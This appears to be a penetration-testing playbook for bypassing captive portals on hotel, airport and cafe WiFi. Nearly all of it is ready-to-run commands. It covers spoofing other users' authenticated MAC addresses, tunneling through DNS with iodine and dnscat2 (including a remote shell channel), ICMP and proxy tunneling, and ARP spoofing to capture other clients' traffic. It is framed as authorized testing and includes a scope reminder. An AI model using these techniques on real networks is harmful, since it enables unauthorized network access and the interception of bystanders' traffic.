Captive Portal Bypass

#Overview

Captive portals are web-based authentication gateways used by hotels, airports, cafes, and corporate guest networks to control network access. They range from simple MAC-based whitelists to complex authentication systems with payment processing. This guide covers techniques to bypass captive portals for authorized pentesting engagements.

#Attack Decision Tree

Captive Portal Detected?
  |
  |-- MAC-based filtering
  |     |-- Spoof authenticated client MAC --> See Method 1
  |     |-- OUI fingerprinting for realistic MACs --> See Method 1
  |
  |-- DNS/ICMP tunneling allowed
  |     |-- DNS tunneling (iodine, dnscat2) --> See Method 2
  |     |-- ICMP tunneling (ptunnel) --> See Method 3
  |
  |-- HTTP/HTTPS proxy bypass
  |     |-- HTTP CONNECT method --> See Method 4
  |     |-- HTTPS to arbitrary ports --> See Method 4
  |
  |-- ARP spoofing within portal network
  |     |-- Man-in-the-middle --> See Method 5
  |     |-- Traffic interception --> See Method 5
  |
  |-- Portal page vulnerabilities
        |-- SQL injection in login form
        |-- Authentication bypass (default creds)
        |-- Session fixation/hijacking

TEXT

#Method 1: MAC Whitelist Bypass

The most common captive portal mechanism — only allows traffic from MAC addresses that have authenticated through the portal.

#Passive MAC Discovery

# Monitor authenticated clients
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC>

# Alternatively, on a wired connection behind the AP:
# Listen for ARP traffic to discover authenticated MACs
tcpdump -i eth0 -nn -e arp
# Look for ARP requests/responses from authenticated clients

# Identify authenticated MACs
arp-scan --interface=eth0 --localnet

BASH

#MAC Spoofing

# Method 1: ifconfig
sudo ifconfig wlan0 down
sudo ifconfig wlan0 hw ether <AUTHENTICATED_MAC>
sudo ifconfig wlan0 up

# Method 2: macchanger
sudo ifconfig wlan0 down
sudo macchanger -m <AUTHENTICATED_MAC> wlan0
sudo ifconfig wlan0 up

# Method 3: ip command
sudo ip link set dev wlan0 down
sudo ip link set dev wlan0 address <AUTHENTICATED_MAC>
sudo ip link set dev wlan0 up

# Verify MAC change
ip link show wlan0 | grep ether

BASH

#OUI Fingerprinting for Realistic MACs

# When spoofing a MAC, use the same OUI (first 3 bytes) as the target device type
# This prevents MAC filtering by device type

# Common OUI prefixes:
# Apple:    00:03:93, 00:05:02, 00:0A:27, 00:0A:95, 00:0D:93
# Samsung:  00:12:FB, 00:15:99, 00:16:32, 00:17:C7, 00:18:41
# Dell:     00:01:C8, 00:06:5B, 00:08:74, 00:0B:DB, 00:0D:56
# HP:       00:01:E6, 00:02:A5, 00:04:EA, 00:06:5B, 00:07:85
# Cisco:    00:00:0C, 00:03:E3, 00:05:5E, 00:06:28, 00:08:02

# Use macchanger to set a specific OUI
sudo macchanger -m 00:03:93:XX:XX:XX wlan0  # Apple OUI

BASH

#Timing Considerations

Race condition: If the authenticated client disconnects, the portal may release the MAC. Spoof before the portal times out the session.
Concurrent MAC: If both the original client and the attacker use the same MAC simultaneously, the portal may detect the conflict and block both.
Best approach: Wait for the authenticated client to disconnect naturally, then immediately spoof their MAC.

#Method 2: DNS Tunneling

DNS tunneling exploits the fact that most captive portals allow DNS queries (UDP port 53) to external resolvers. By encoding data in DNS queries, you can tunnel traffic through the portal.

#iodine (DNS Tunnel)

# Server (outside the captive portal):
sudo iodined -f -c -P <password> 10.0.0.1 <your-domain.com>

# Client (behind the captive portal):
sudo iodine -f -P <password> <dns-server-ip> <your-domain.com>

# Once connected, you have a DNS-based tunnel (10.0.0.1 ↔ 10.0.0.2)
# Route traffic through the tunnel:
sudo ip route add <target_subnet> via 10.0.0.1

# Or set up SOCKS proxy through SSH
ssh -D 1080 -N user@10.0.0.1

BASH

#dnscat2 (DNS Tunnel with Encryption)

# Server (outside the captive portal):
ruby dnscat2.rb <your-domain.com> --secret=<secret_key>

# Client (behind the captive portal):
./dnscat --dns server=<dns_server_ip> --secret=<secret_key>

# dnscat2 provides an encrypted command-and-control channel
# Commands:
# -> download <file>
# -> upload <file>
# -> shell  # Open a shell session
# -> tunnels  # List active tunnels

BASH

#DNS Tunneling Detection Bypass

# Some portals inspect DNS queries for tunneling patterns
# Use HTTPS-based DNS (DoH) to bypass:
curl -s "https://dns.google/resolve?name=<domain>&type=A"

# Or use DNS-over-TLS:
stunnel /etc/stunnel/dns.conf &
dig @127.0.0.1 <domain> A

BASH

#Method 3: ICMP Tunneling

If DNS tunneling is blocked, ICMP tunneling may work — most portals allow ICMP (ping) traffic.

# Server (outside the captive portal):
sudo ptunnel

# Client (behind the captive portal):
sudo ptunnel -p <server_ip> -da 127.0.0.1 -dp 22

# This creates an ICMP tunnel that carries SSH traffic
# Connect through the tunnel:
ssh -p 22 user@127.0.0.1

BASH

#Method 4: HTTP/HTTPS Proxy Bypass

Some captive portals allow HTTP/HTTPS traffic to specific ports or use proxy-based filtering.

#HTTP CONNECT Method

# If the portal allows HTTP CONNECT (typically for HTTPS):
# Set up a proxy through CONNECT
proxytunnel -p <captive_portal_proxy>:8080 \
  -d <external_server>:443 \
  -H "Host: <external_server>"

# Or use SSH through the proxy:
ssh -o "ProxyCommand=proxytunnel -p <proxy>:8080 -d %h:%p" user@<external_server>

BASH

#HTTPS to Arbitrary Ports

# Some portals only filter port 80/443 but allow HTTPS to any port
# Test:
curl -k https://<external_server>:443/  # Usually allowed
curl -k https://<external_server>:8443/  # Test if other HTTPS ports work

# If allowed, set up an SSH server on port 443:
# On external server:
sshd -p 443

# From behind the portal:
ssh -p 443 user@<external_server>

BASH

#Method 5: ARP Spoofing Within Portal Network

If you're on the same subnet as authenticated clients, ARP spoofing can intercept their traffic.

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# ARP spoof between target and gateway
arpspoof -i wlan0 -t <target_ip> <gateway_ip>
arpspoof -i wlan0 -t <gateway_ip> <target_ip>

# Capture traffic
tcpdump -i wlan0 -w captured-traffic.pcap host <target_ip>

# Or use bettercap
sudo bettercap -iface wlan0
> net.probe on
> net.sniff on
> set arp.spoof.targets <target_ip>
> arp.spoof on

BASH

#Method 6: Forced Redirection Bypass

Some captive portals redirect HTTP traffic to the login page. Techniques to bypass:

# 1. Use HTTPS directly (some portals only redirect HTTP)
curl -L https://<external_server>/

# 2. Modify User-Agent to appear as a health check
curl -A "CaptiveNetworkSupport-1.0" http://<captive_portal_check_url>/

# 3. Access the portal's internal resources
# Many portals expose admin interfaces on internal IPs
nmap -sn <captive_portal_subnet>
nmap -sV -p 80,443,8080,8443 <portal_internal_ip>

# 4. IPv6 bypass (if the portal only filters IPv4)
# Some portals allow IPv6 traffic unauthenticated
ping6 -c 3 <ipv6_target>
curl -6 https://<external_ipv6_server>/

BASH

#Practical: Hotel/Airport WiFi Testing Methodology

Connect to the network — Obtain a DHCP lease, note the gateway and DNS servers
Assess the portal — Visit http://neverssl.com/ or http://captive.apple.com/ to trigger the portal
Determine the authentication mechanism — MAC whitelist? Login form? Payment? Time-limited?
Try MAC spoofing first — Lowest noise, highest success rate
Try DNS tunneling next — If MAC spoofing fails, tunnel through DNS
Try HTTP/HTTPS bypass — If DNS is filtered, try proxy bypass
Try ARP spoofing — If other clients are present on the same subnet
Test for portal vulnerabilities — SQL injection, auth bypass, default credentials

#Common Pitfalls

MAC address conflict: If the original client is still connected, spoofing their MAC creates a conflict. Wait for them to disconnect.
Portal session timeout: Most portals expire sessions after 1–24 hours. Re-spoof MAC before the session expires.
DNS filtering: Some portals block known DNS tunneling services. Try alternative resolvers or DoH.
HTTPS inspection: Advanced portals may perform SSL inspection. Use certificate pinning or tunnel over DNS/ICMP instead.
Device fingerprinting: Modern portals may fingerprint by MAC OUI, DHCP fingerprint, and User-Agent. Spoof all identifiers consistently.

#OPSEC Considerations

MAC spoofing is detectable by correlating MAC changes with authentication events
DNS tunneling generates unusual DNS query patterns (high volume, long subdomain labels)
ARP spoofing is detectable by monitoring ARP tables for duplicate MAC entries
Captive portal login pages may log IP addresses and timestamps
Always verify scope explicitly covers captive portal bypass

#Cross-References

MAC Filtering Bypass — MAC spoofing in detail
NAC Bypass — Network Access Control bypass
Evil Twin & Rogue AP — Setting up a rogue AP that mimics the captive portal
07 - Post-Exploitation — Pivoting after gaining network access

#Tool References

Tool	Purpose	Link
macchanger	MAC address spoofing	https://github.com/alxchk/macchanger
iodine	DNS tunneling	https://code.kryo.se/iodine/
dnscat2	Encrypted DNS tunnel	https://github.com/iagox86/dnscat2
ptunnel	ICMP tunneling	https://www.cs.uit.no/~daniels/PingTunnel/
proxytunnel	HTTP CONNECT proxy	https://github.com/airofgui/proxytunnel
bettercap	ARP spoofing and MITM	https://www.bettercap.org/
arpspoof	ARP spoofing	https://github.com/porjo/yarp